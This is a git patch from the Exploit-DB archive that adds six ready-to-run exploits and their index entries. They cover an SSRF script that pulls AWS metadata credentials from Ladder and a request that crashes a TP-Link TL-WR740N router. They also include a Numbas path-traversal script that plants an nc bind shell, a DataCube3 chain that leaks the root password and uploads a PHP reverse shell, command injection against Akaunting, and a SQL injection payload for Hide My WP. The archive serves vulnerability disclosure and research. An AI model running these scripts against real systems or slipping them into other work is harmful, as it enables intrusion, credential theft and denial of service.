From 60a90afc8d6d593c94ff6d3447ea1d584ea6a048 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Mon, 11 Mar 2024 00:16:24 +0000
Subject: [PATCH] DB: 2024-03-11

7 changes to exploits/shellcodes/ghdb

Ladder v0.0.21 - Server-side request forgery (SSRF)

TP-Link TL-WR740N - Buffer Overflow 'DOS'

Numbas < v7.3 - Remote Code Execution

Akaunting < 3.1.3 - RCE

DataCube3 v1.0 - Unrestricted file upload 'RCE'

Hide My WP < 6.2.9 - Unauthenticated SQLi
---
 exploits/go/webapps/51869.txt       |  18 +++
 exploits/hardware/webapps/51866.txt |  58 ++++++++++
 exploits/nodejs/webapps/51867.txt   | 167 ++++++++++++++++++++++++++++
 exploits/php/webapps/51868.txt      | 145 ++++++++++++++++++++++++
 exploits/php/webapps/51870.txt      | 122 ++++++++++++++++++++
 exploits/php/webapps/51871.txt      |  21 ++++
 files_exploits.csv                  |   6 +
 7 files changed, 537 insertions(+)
 create mode 100644 exploits/go/webapps/51869.txt
 create mode 100644 exploits/hardware/webapps/51866.txt
 create mode 100644 exploits/nodejs/webapps/51867.txt
 create mode 100644 exploits/php/webapps/51868.txt
 create mode 100644 exploits/php/webapps/51870.txt
 create mode 100644 exploits/php/webapps/51871.txt

diff --git a/exploits/go/webapps/51869.txt b/exploits/go/webapps/51869.txt
new file mode 100644
index 0000000000..22910ed488
--- /dev/null
+++ b/exploits/go/webapps/51869.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Ladder v0.0.21 - Server-side request forgery (SSRF)
+# Date: 2024-01-20
+# Exploit Author: @_chebuya
+# Software Link: https://github.com/everywall/ladder
+# Version: v0.0.1 - v0.0.21
+# Tested on: Ubuntu 20.04.6 LTS on AWS EC2 (ami-0fd63e471b04e22d0)
+# CVE: CVE-2024-27620
+# Description: Ladder fails to apply sufficient default restrictions on destination addresses, allowing an attacker to make GET requests to addresses that would typically not be accessible from an external context.  An attacker can access private address ranges, locally listening services, and cloud instance metadata APIs
+
+import requests
+import json
+
+target_url = "http://127.0.0.1:8080/api/"
+imdsv1_url = "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"
+
+r = requests.get(target_url + imdsv1_url)
+response_json = json.loads(r.text)
+print(response_json["body"])
\ No newline at end of file
diff --git a/exploits/hardware/webapps/51866.txt b/exploits/hardware/webapps/51866.txt
new file mode 100644
index 0000000000..8ce20a2b77
--- /dev/null
+++ b/exploits/hardware/webapps/51866.txt
@@ -0,0 +1,58 @@
+# Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS'
+# Date: 8/12/2023
+# Exploit Author: Anish Feroz (ZEROXINN)
+# Vendor Homepage: http://www.tp-link.com
+# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
+# Tested on: TP-Link TL-WR740N
+
+#Description:
+
+#There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router.
+
+#Usage:
+
+#python3 target username password
+#change port, if required
+
+------------------------------------------------POC-----------------------------------------
+
+#!/usr/bin/python
+
+import requests
+from requests.auth import HTTPBasicAuth
+import base64
+
+def send_request(ip, username, password):
+    auth_url = f"http://{ip}:8082"
+    target_url = f"http://{ip}:8082/userRpm/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20"
+
+    credentials = f"{username}:{password}"
+    encoded_credentials = base64.b64encode(credentials.encode()).decode()
+
+    headers = {
+        "Host": f"{ip}:8082",
+        "Authorization": f"Basic {encoded_credentials}",
+        "Upgrade-Insecure-Requests": "1",
+        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36",
+        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
+        "Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm",
+        "Accept-Encoding": "gzip, deflate",
+        "Accept-Language": "en-US,en;q=0.9",
+        "Connection": "close"
+    }
+
+    session = requests.Session()
+
+    response = session.get(target_url, headers=headers)
+
+    if response.status_code == 200:
+        print("Server Crashed")
+        print(response.text)
+    else:
+        print(f"Script Completed with status code {response.status_code}")
+
+ip_address = input("Enter IP address of the host: ")
+username = input("Enter username: ")
+password = input("Enter password: ")
+
+send_request(ip_address, username, password)
\ No newline at end of file
diff --git a/exploits/nodejs/webapps/51867.txt b/exploits/nodejs/webapps/51867.txt
new file mode 100644
index 0000000000..147e371ef2
--- /dev/null
+++ b/exploits/nodejs/webapps/51867.txt
@@ -0,0 +1,167 @@
+# Exploit Title: Numbas < v7.3 - Remote Code Execution
+# Google Dork: N/A
+# Date: March 7th, 2024
+# Exploit Author: Matheus Boschetti
+# Vendor Homepage: https://www.numbas.org.uk/
+# Software Link: https://github.com/numbas/Numbas
+# Version: 7.2 and below
+# Tested on: Linux
+# CVE: CVE-2024-27612
+
+import sys, requests, re, argparse, subprocess, time
+from bs4 import BeautifulSoup
+
+s = requests.session()
+
+def getCSRF(target):
+    url = f"http://{target}/"
+    req = s.get(url)
+    soup = BeautifulSoup(req.text, 'html.parser')
+    csrfmiddlewaretoken = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value']
+    return csrfmiddlewaretoken
+
+def createTheme(target):
+    # Format request
+    csrfmiddlewaretoken = getCSRF(target)
+    theme = 'ExampleTheme'
+    boundary = '----WebKitFormBoundaryKUMXsLP31HzARUV1'
+    data = (
+        f'--{boundary}\r\n'
+        'Content-Disposition: form-data; name="csrfmiddlewaretoken"\r\n'
+        '\r\n'
+        f'{csrfmiddlewaretoken}\r\n'
+        f'--{boundary}\r\n'
+        'Content-Disposition: form-data; name="name"\r\n'
+        '\r\n'
+        f'{theme}\r\n'
+        f'--{boundary}--\r\n'
+    )
+    headers = {'Content-Type': f'multipart/form-data; boundary={boundary}',
+               'User-Agent': 'Mozilla/5.0',
+               'Accept': '*/*',
+               'Connection': 'close'}
+
+    # Create theme and return its ID
+    req = s.post(f"http://{target}/theme/new/", headers=headers, data=data)
+    redir = req.url
+    split = redir.split('/')
+    id = split[4]
+    print(f"\t[i] Theme created with ID {id}")
+    return id
+
+def login(target, user, passwd):
+    print("\n[i] Attempting to login...")
+
+    csrfmiddlewaretoken = getCSRF(target)
+    data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,
+            'username': user,
+            'password': passwd,
+            'next': '/'}
+
+    # Login
+    login = s.post(f"http://{target}/login/", data=data, allow_redirects=True)
+    res = login.text
+    if("Logged in as" not in res):
+        print("\n\n[!] Login failed!")
+        sys.exit(-1)
+
+    # Check if logged and fetch ID
+    usermatch = re.search(r'Logged in as <strong>(.*?)</strong>', res)
+    if usermatch:
+        user = usermatch.group(1)
+        idmatch = re.search(r'<a href="/accounts/profile/(.*?)/"><span class="glyphicon glyphicon-user">', res)
+        if idmatch:
+            id = idmatch.group(1)
+            print(f"\t[+] Logged in as \"{user}\" with ID {id}")
+
+def checkVuln(url):
+    print("[i] Checking if target is vulnerable...")
+
+    # Attempt to read files
+    themeID = createTheme(url)
+    target = f"http://{url}/themes/{themeID}/edit_source?filename=../../../../../../../../../.."
+    hname = s.get(f"{target}/etc/hostname")
+    ver = s.get(f"{target}/etc/issue")
+    hnamesoup = BeautifulSoup(hname.text, 'html.parser')
+    versoup = BeautifulSoup(ver.text, 'html.parser')
+    hostname = hnamesoup.find('textarea').get_text().strip()
+    version = versoup.find('textarea').get_text().strip()
+    if len(hostname) < 1:
+        print("\n\n[!] Something went wrong - target might not be vulnerable.")
+        sys.exit(-1)
+    print(f"\n[+] Target \"{hostname}\" is vulnerable!")
+    print(f"\t[i] Running: \"{version}\"")
+
+    # Cleanup - delete theme
+    print(f"\t\t[i] Cleanup: deleting theme {themeID}...")
+    target = f"http://{url}/themes/{themeID}/delete"
+    csrfmiddlewaretoken = getCSRF(url)
+    data = {'csrfmiddlewaretoken':csrfmiddlewaretoken}
+    s.post(target, data=data)
+
+
+def replaceInit(target):
+    # Overwrite __init__.py with arbitrary code
+    rport = '8443'
+    payload = f"import subprocess;subprocess.Popen(['nc','-lnvp','{rport}','-e','/bin/bash'])"
+    csrfmiddlewaretoken = getCSRF(target)
+    filename = '../../../../numbas_editor/numbas/__init__.py'
+    themeID = createTheme(target)
+    data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,
+            'source': payload,
+            'filename': filename}
+
+    print("[i] Delivering payload...")
+    # Retry 5 times in case something goes wrong...
+    for attempt in range(5):
+        try:
+            s.post(f"http://{target}/themes/{themeID}/edit_source", data=data, timeout=10)
+        except Exception as e:
+            pass
+
+    # Establish connection to bind shell
+    time.sleep(2)
+    print(f"\t[+] Payload delivered, establishing connection...\n")
+    if ":" in target:
+        split = target.split(":")
+        ip = split[0]
+    else:
+        ip = str(target)
+    subprocess.Popen(["nc", "-n", ip, rport])
+    while True:
+        pass
+
+
+def main():
+    parser = argparse.ArgumentParser()
+    if len(sys.argv) <= 1:
+        print("\n[!] No option provided!")
+        print("\t- check: Passively check if the target is vulnerable by attempting to read files from disk\n\t- exploit: Attempt to actively exploit the target\n")
+        print(f"[i] Usage: python3 {sys.argv[0]} <option> --target 172.16.1.5:80 --user example --passwd qwerty")
+        sys.exit(-1)
+
+    group = parser.add_mutually_exclusive_group(required=True)
+    group.add_argument('action', nargs='?', choices=['check', 'exploit'], help='Action to perform: check or exploit')
+    parser.add_argument('--target', help='Target IP:PORT')
+    parser.add_argument('--user', help='Username to authenticate')
+    parser.add_argument('--passwd', help='Password to authenticate')
+    args = parser.parse_args()
+    action = args.action
+    target = args.target
+    user = args.user
+    passwd = args.passwd
+
+    print("\n\t\t-==[ CVE-2024-27612: Numbas Remote Code Execution (RCE) ]==-")
+
+    if action == 'check':
+        login(target, user, passwd)
+        checkVuln(target)
+    elif action == 'exploit':
+        login(target, user, passwd)
+        replaceInit(target)
+    else:
+        sys.exit(-1)
+
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/php/webapps/51868.txt b/exploits/php/webapps/51868.txt
new file mode 100644
index 0000000000..2af5e4aa49
--- /dev/null
+++ b/exploits/php/webapps/51868.txt
@@ -0,0 +1,145 @@
+# Exploit Title: DataCube3 v1.0 - Unrestricted file upload 'RCE'
+# Date: 7/28/2022
+# Exploit Author: Samy Younsi - NS Labs (https://neroteam.com)
+# Vendor Homepage: https://www.f-logic.jp
+# Software Link: https://www.f-logic.jp/pdf/support/manual_product/manual_product_datacube3_ver1.0_sc.pdf
+# Version: Ver1.0
+# Tested on: DataCube3 version 1.0 (Ubuntu)
+# CVE : CVE-2024-25830 + CVE-2024-25832
+
+# Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload
+
+from __future__ import print_function, unicode_literals
+from bs4 import BeautifulSoup
+import argparse
+import requests
+import json
+import urllib3
+import re
+urllib3.disable_warnings()
+
+def banner():
+  dataCube3Logo = """
+        ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓▓▓
+      ▒▒▒▒▒▒▒▒██        DataCube3   Ver1.0      █F-logic▓▓
+      ▒▒████▒▒██        ████        ████        ██▓▓▓▓▓▓▓▓
+      ▒▒████▒▒██        ████        ████        ██▓▓▓▓▓▓▓▓
+      ▒▒▒▒▒▒▒▒██        ████        ████        ██▓▓▓▓▓▓▓▓
+      ▒▒▒▒▒▒▒▒██                                ██▓▓████▓▓
+      ▒▒▒▒▒▒▒▒██        ██             ██       ██▓▓████▓▓
+      ▒▒▒▒▒▒▒▒██        █████████████████       ██▓▓▓▓▓▓▓▓
+        ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓
+
+\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m         \033[1;91mDataCube3 exploit chain reverse shell\033[1;m
+                FOR EDUCATIONAL PURPOSE ONLY.
+  """
+  return print('\033[1;94m{}\033[1;m'.format(dataCube3Logo))
+
+
+def extractRootPwd(RHOST, RPORT, protocol):
+  url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)
+  try:
+    response = requests.get(url, allow_redirects=False, verify=False, timeout=20)
+    if response.status_code != 302:
+      print('[!] \033[1;91mError: DataCube3 web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
+      exit()
+    soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
+    scriptTag = str(soup.find_all('script')[12]).replace(' ', '')
+    rawLeakedData = re.findall('configData:.*,', scriptTag)[0]
+    jsonLeakedData = json.loads('[{}]'.format(rawLeakedData.split('configData:[')[1].split('],')[0]))
+    adminPassword = jsonLeakedData[12]['value']
+    rootPassword = jsonLeakedData[14]['value']
+    print('[INFO] DataCube3 leaked credentials successfully extracted: admin:{} | root:{}.\n[INFO] The target must be vulnerable.'.format(adminPassword, rootPassword))
+    return rootPassword
+  except:
+    print('[ERROR] Can\'t grab the DataCube3 version...')
+
+
+def generateAuthCookie(RHOST, RPORT, protocol, rootPassword):
+  print('[INFO] Generating DataCube3 auth cookie ...')
+  url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)
+  data = {
+    'user_id': 'root',
+    'user_pw': rootPassword,
+    'login': '%E3%83%AD%E3%82%B0%E3%82%A4%E3%83%B3'
+  }
+  try:
+    response = requests.post(url, data=data, allow_redirects=False, verify=False, timeout=20)
+    if response.status_code != 302:
+      print('[!] \033[1;91mError: An error occur while trying to get the auth cookie, is the root password correct?\033[1;m')
+      exit()
+    authCookie = response.cookies.get_dict()
+    print('[INFO] Authentication successful! Auth Cookie: {}'.format(authCookie))
+    return authCookie
+  except:
+    print('[ERROR] Can\'t grab the auth cookie, is the root password correct?')
+
+
+def extractAccesstime(RHOST, RPORT, LHOST, LPORT, protocol, authCookie):
+  print('[INFO] Extracting Accesstime ...')
+  url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)
+  try:
+    response = requests.get(url, cookies=authCookie, allow_redirects=False, verify=False, timeout=20)
+    if response.status_code != 302:
+      print('[!] \033[1;91mError: An error occur while trying to get the accesstime value.\033[1;m')
+      exit()
+    soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
+    accessTime = soup.find('input', {'name': 'accesstime'}).get('value')
+    print('[INFO] AccessTime value: {}'.format(accessTime))
+    return accessTime
+  except:
+    print('[ERROR] Can\'t grab the accesstime value, is the root password correct?')
+
+
+def injectReverseShell(RHOST, RPORT, LHOST, LPORT, protocol, authCookie, accessTime):
+  print('[INFO] Injecting PHP reverse shell script ...')
+  filename='rvs.php'
+  payload = '<?php $sock=fsockopen("{}",{});$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'.format(LHOST, LPORT)
+
+  data = '-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="add"\r\n\r\nå��ç��追å�\xA0\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="addPhoto"; filename="{}"\r\nContent-Type: image/jpeg\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="accesstime"\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396--\r\n'.format(filename, payload, accessTime)
+
+  headers = {
+      'Content-Type': 'multipart/form-data; boundary=---------------------------113389720123090127612523184396'
+  }
+  url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)
+  try:
+    response = requests.post(url, cookies=authCookie, headers=headers, data=data, allow_redirects=False, verify=False, timeout=20)
+    if response.status_code != 302:
+        print('[!] \033[1;91mError: An error occur while trying to upload the PHP reverse shell script.\033[1;m')
+        exit()
+    shellURL = '{}://{}:{}/images/slideshow/{}'.format(protocol, RHOST, RPORT, filename)
+    print('[INFO] PHP reverse shell script successfully uploaded!\n[INFO] SHELL URL: {}'.format(shellURL))
+    return shellURL
+  except:
+    print('[ERROR] Can\'t upload the PHP reverse shell script, is the root password correct?')
+
+
+def execReverseShell(shellURL):
+  print('[INFO] Executing reverse shell...')
+  try:
+    response = requests.get(shellURL, allow_redirects=False, verify=False)
+    print('[INFO] Reverse shell successfully executed.')
+    return
+  except Exception as e:
+      print('[ERROR] Reverse shell failed. Make sure the DataCube3 device can reach the host {}:{}')
+      return False
+
+
+def main():
+  banner()
+  args = parser.parse_args()
+  protocol = 'https' if args.RPORT == 443 else 'http'
+  rootPassword = extractRootPwd(args.RHOST, args.RPORT, protocol)
+  authCookie = generateAuthCookie(args.RHOST, args.RPORT, protocol, rootPassword)
+  accessTime = extractAccesstime(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie)
+  shellURL = injectReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie, accessTime)
+  execReverseShell(shellURL)
+
+
+if __name__ == '__main__':
+  parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on f-logic DataCube3 devices.', add_help=False)
+  parser.add_argument('--RHOST', help='Refers to the IP of the target machine. (f-logic DataCube3 device)', type=str, required=True)
+  parser.add_argument('--RPORT', help='Refers to the open port of the target machine. (443 by default)', type=int, required=True)
+  parser.add_argument('--LHOST', help='Refers to the IP of your machine.', type=str, required=True)
+  parser.add_argument('--LPORT', help='Refers to the open port of your machine.', type=int, required=True)
+  main()
\ No newline at end of file
diff --git a/exploits/php/webapps/51870.txt b/exploits/php/webapps/51870.txt
new file mode 100644
index 0000000000..411591ebaf
--- /dev/null
+++ b/exploits/php/webapps/51870.txt
@@ -0,0 +1,122 @@
+# Exploit Title: Akaunting < 3.1.3 - RCE
+# Date: 08/02/2024
+# Exploit Author: u32i@proton.me
+# Vendor Homepage: https://akaunting.com
+# Software Link: https://github.com/akaunting/akaunting
+# Version: <= 3.1.3
+# Tested on: Ubuntu (22.04)
+# CVE : CVE-2024-22836
+
+#!/usr/bin/python3
+
+import sys
+import re
+import requests
+import argparse
+
+def get_company():
+	# print("[INF] Retrieving company id...")
+	res = requests.get(target, headers=headers, cookies=cookies, allow_redirects=False)
+	if res.status_code != 302:
+		print("[ERR] No company id was found!")
+		sys.exit(3)
+	cid = res.headers['Location'].split('/')[-1]
+	if cid == "login":
+		print("[ERR] Invalid session cookie!")
+		sys.exit(7)
+	return cid
+
+def get_tokens(url):
+	res = requests.get(url, headers=headers, cookies=cookies, allow_redirects=False)
+	search_res = re.search(r"\"csrfToken\"\:\".*\"", res.text)
+
+	if not search_res:
+		print("[ERR] Couldn't get csrf token")
+		sys.exit(1)
+
+	data = {}
+	data['csrf_token'] = search_res.group().split(':')[-1:][0].replace('"', '')
+	data['session'] = res.cookies.get('akaunting_session')
+	return data
+
+def inject_command(cmd):
+	url = f"{target}/{company_id}/wizard/companies"
+	tokens = get_tokens(url)
+	headers.update({"X-Csrf-Token": tokens['csrf_token']})
+	data = {"_token": tokens['csrf_token'], "_method": "POST", "_prefix": "company", "locale": f"en_US && {cmd}"}
+	res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)
+	if res.status_code == 200:
+		res_data = res.json()
+		if res_data['error']:
+			print("[ERR] Command injection failed!")
+			sys.exit(4)
+		print("[INF] Command injected!")
+
+
+def trigger_rce(app, version = "1.0.0"):
+	print("[INF] Executing the command...")
+	url = f"{target}/{company_id}/apps/install"
+	data = {"alias": app, "version": version, "path": f"apps/{app}/download"}
+	headers.update({"Content-Type":"application/json"})
+	res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)
+	if res.status_code == 200:
+		res_data = res.json()
+		if res_data['error']:
+			search_res = re.search(r">Exit Code\:.*<", res_data['message'])
+			if search_res:
+				print("[ERR] Failed to execute the command")
+				sys.exit(6)
+			print("[ERR] Failed to install the app! no command was executed!")
+			sys.exit(5)
+		print("[INF] Executed successfully!")
+
+def login(email, password):
+	url = f"{target}/auth/login"
+	tokens = get_tokens(url)
+
+	cookies.update({
+		'akaunting_session': tokens['session']
+	})
+
+	data = {
+		"_token": tokens['csrf_token'],
+		"_method": "POST",
+		"email": email,
+		"password": password
+	}
+
+	req = requests.post(url, headers=headers, cookies=cookies, data=data)
+	res = req.json()
+	if res['error']:
+		print("[ERR] Failed to log in!")
+		sys.exit(8)
+
+	print("[INF] Logged in")
+	cookies.update({'akaunting_session': req.cookies.get('akaunting_session')})
+
+def main():
+	inject_command(args.command)
+	trigger_rce(args.alias, args.version)
+
+if __name__=='__main__':
+	parser = argparse.ArgumentParser()
+	parser.add_argument("-u", "--url", help="target url")
+	parser.add_argument("--email", help="user login email.")
+	parser.add_argument("--password", help="user login password.")
+	parser.add_argument("-i", "--id", type=int, help="company id (optional).")
+	parser.add_argument("-c", "--command", help="command to execute.")
+	parser.add_argument("-a", "--alias", help="app alias, default: paypal-standard", default="paypal-standard")
+	parser.add_argument("-av", "--version", help="app version, default: 3.0.2", default="3.0.2")
+
+	args = parser.parse_args()
+
+	headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"}
+	cookies = {}
+	target = args.url
+
+	try:
+		login(args.email, args.password)
+		company_id = get_company() if not args.id else args.id
+		main()
+	except:
+		sys.exit(0)
\ No newline at end of file
diff --git a/exploits/php/webapps/51871.txt b/exploits/php/webapps/51871.txt
new file mode 100644
index 0000000000..5354580d26
--- /dev/null
+++ b/exploits/php/webapps/51871.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi
+# Publication Date: 2023-01-11
+# Original Researcher: Xenofon Vassilakopoulos
+# Exploit Author: Xenofon Vassilakopoulos
+# Submitter: Xenofon Vassilakopoulos
+# Vendor Homepage: https://wpwave.com/
+# Version: Hide My WP v6.2.8 and prior
+# Tested on: Hide My WP v6.2.7
+# Impact: Database Access
+# CVE: CVE-2022-4681
+# CWE: CWE-89
+# CVSS Score: 8.6 (high)
+
+## Description
+
+The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
+
+
+## Proof of Concept
+
+curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8522d516cd..406b220231 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -2901,6 +2901,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
 51257,exploits/go/webapps/51257.py,"Answerdev 1.0.3 - Account Takeover",2023-04-05,"Eduardo Pérez-Malumbres Cervera",webapps,go,,2023-04-05,2023-04-27,1,CVE-2023-0744,,,,,
+51869,exploits/go/webapps/51869.txt,"Ladder v0.0.21 - Server-side request forgery (SSRF)",2024-03-10,@_chebuya,webapps,go,,2024-03-10,2024-03-10,0,CVE-2024-27620,,,,,
 51734,exploits/go/webapps/51734.py,"Minio 2022-07-29T19-40-48Z - Path traversal",2023-10-09,"Jenson Zhao",webapps,go,,2023-10-09,2023-10-09,0,CVE-2022-35919,,,,,
 51497,exploits/go/webapps/51497.txt,"Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32751,,,,,
 51498,exploits/go/webapps/51498.txt,"Pydio Cells 4.1.2 - Server-Side Request Forgery",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32750,,,,,
@@ -4919,6 +4920,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47483,exploits/hardware/webapps/47483.py,"TP-Link TL-WR1043ND 2 - Authentication Bypass",2019-10-10,"Uriel Kosayev",webapps,hardware,80,2019-10-10,2019-10-10,0,CVE-2019-6971,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
 34583,exploits/hardware/webapps/34583.txt,"TP-Link TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,webapps,hardware,80,2014-09-09,2014-09-09,0,OSVDB-111720;OSVDB-111712;OSVDB-111711;OSVDB-111708;OSVDB-111707;OSVDB-111706;OSVDB-111705;OSVDB-111704;OSVDB-111703;OSVDB-100357;OSVDB-100355,,,,,
 51606,exploits/hardware/webapps/51606.txt,"TP-Link TL-WR740N - Authenticated Directory Transversal",2023-07-19,"Anish Feroz",webapps,hardware,,2023-07-19,2023-07-19,0,,,,,,
+51866,exploits/hardware/webapps/51866.txt,"TP-Link TL-WR740N - Buffer Overflow 'DOS'",2024-03-10,"Anish Feroz",webapps,hardware,,2024-03-10,2024-03-10,0,,,,,,
 43148,exploits/hardware/webapps/43148.txt,"TP-Link TL-WR740N - Cross-Site Scripting",2017-11-16,bl00dy,webapps,hardware,,2017-11-16,2017-11-16,0,,,,,,
 51769,exploits/hardware/webapps/51769.txt,"TP-LINK TL-WR740N - Multiple HTML Injection",2024-02-02,"Shujaat Amin (ZEROXINN)",webapps,hardware,,2024-02-02,2024-02-02,0,,,,,,
 51768,exploits/hardware/webapps/51768.txt,"TP-Link TL-WR740N - UnAuthenticated Directory Transversal",2024-02-02,"Syed Affan Ahmed (ZEROXINN)",webapps,hardware,,2024-02-02,2024-02-02,0,,,,,,
@@ -12383,6 +12385,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43922,exploits/nodejs/webapps/43922.html,"KeystoneJS < 4.0.0-beta.7 - Cross-Site Request Forgery",2018-01-28,"Saurabh Banawar",webapps,nodejs,,2018-01-28,2018-01-28,0,CVE-2017-16570,,,,,
 49552,exploits/nodejs/webapps/49552.py,"Node.JS - 'node-serialize' Remote Code Execution (2)",2021-02-10,UndeadLarva,webapps,nodejs,,2021-02-10,2021-02-10,0,CVE-2017-5941,,,,,
 50036,exploits/nodejs/webapps/50036.js,"Node.JS - 'node-serialize' Remote Code Execution (3)",2021-06-18,"Beren Kuday GÖRÜN",webapps,nodejs,,2021-06-18,2021-06-18,0,CVE-2017-5941,,,,,
+51867,exploits/nodejs/webapps/51867.txt,"Numbas < v7.3 - Remote Code Execution",2024-03-10,"Matheus Alexandre",webapps,nodejs,,2024-03-10,2024-03-10,0,CVE-2024-27612,,,,,
 50716,exploits/nodejs/webapps/50716.rb,"Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit)",2022-02-08,WackyH4cker,webapps,nodejs,,2022-02-08,2022-02-08,0,CVE-2019-18818,,,,,
 13906,exploits/novell/dos/13906.txt,"Netware - SMB Remote Stack Overflow (PoC)",2010-06-17,"laurent gaffie",dos,novell,139,2010-06-16,,1,CVE-2010-2351;OSVDB-65625,,,,,
 19746,exploits/novell/dos/19746.txt,"Novell BorderManager 3.0/3.5 Audit Trail Proxy - Denial of Service",2000-02-04,"Chicken Man",dos,novell,,2000-02-04,2012-07-11,1,CVE-2000-0152;OSVDB-7468,,,,,https://www.securityfocus.com/bid/976/info
@@ -13799,6 +13802,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 3752,exploits/php/webapps/3752.txt,"AjPortal2Php - 'PagePrefix' Remote File Inclusion",2007-04-17,"Alkomandoz Hacker",webapps,php,,2007-04-16,,1,OSVDB-37571;CVE-2007-2142;OSVDB-37570;OSVDB-37569;OSVDB-37568;OSVDB-37567;OSVDB-37566;OSVDB-37565,,,,,
 7086,exploits/php/webapps/7086.txt,"AJSquare Free Polling Script - 'DB' Multiple Vulnerabilities",2008-11-10,G4N0K,webapps,php,,2008-11-09,,1,OSVDB-57333;CVE-2008-7046;CVE-2008-7045;OSVDB-49779;CVE-2008-7044,,,,,
 2315,exploits/php/webapps/2315.txt,"Akarru 0.4.3.34 - 'bm_content' Remote File Inclusion",2006-09-06,ddoshomo,webapps,php,,2006-09-05,,1,OSVDB-28566;CVE-2006-4645,,,,,
+51870,exploits/php/webapps/51870.txt,"Akaunting < 3.1.3 - RCE",2024-03-10,u32i,webapps,php,,2024-03-10,2024-03-10,0,CVE-2024-22836,,,,,
 21251,exploits/php/webapps/21251.txt,"akcms 4.2.4 - Information Disclosure",2012-09-11,L0n3ly-H34rT,webapps,php,,2012-09-11,2012-09-16,1,OSVDB-85488,,,,http://www.exploit-db.comakcms4.2.4.tar.gz,
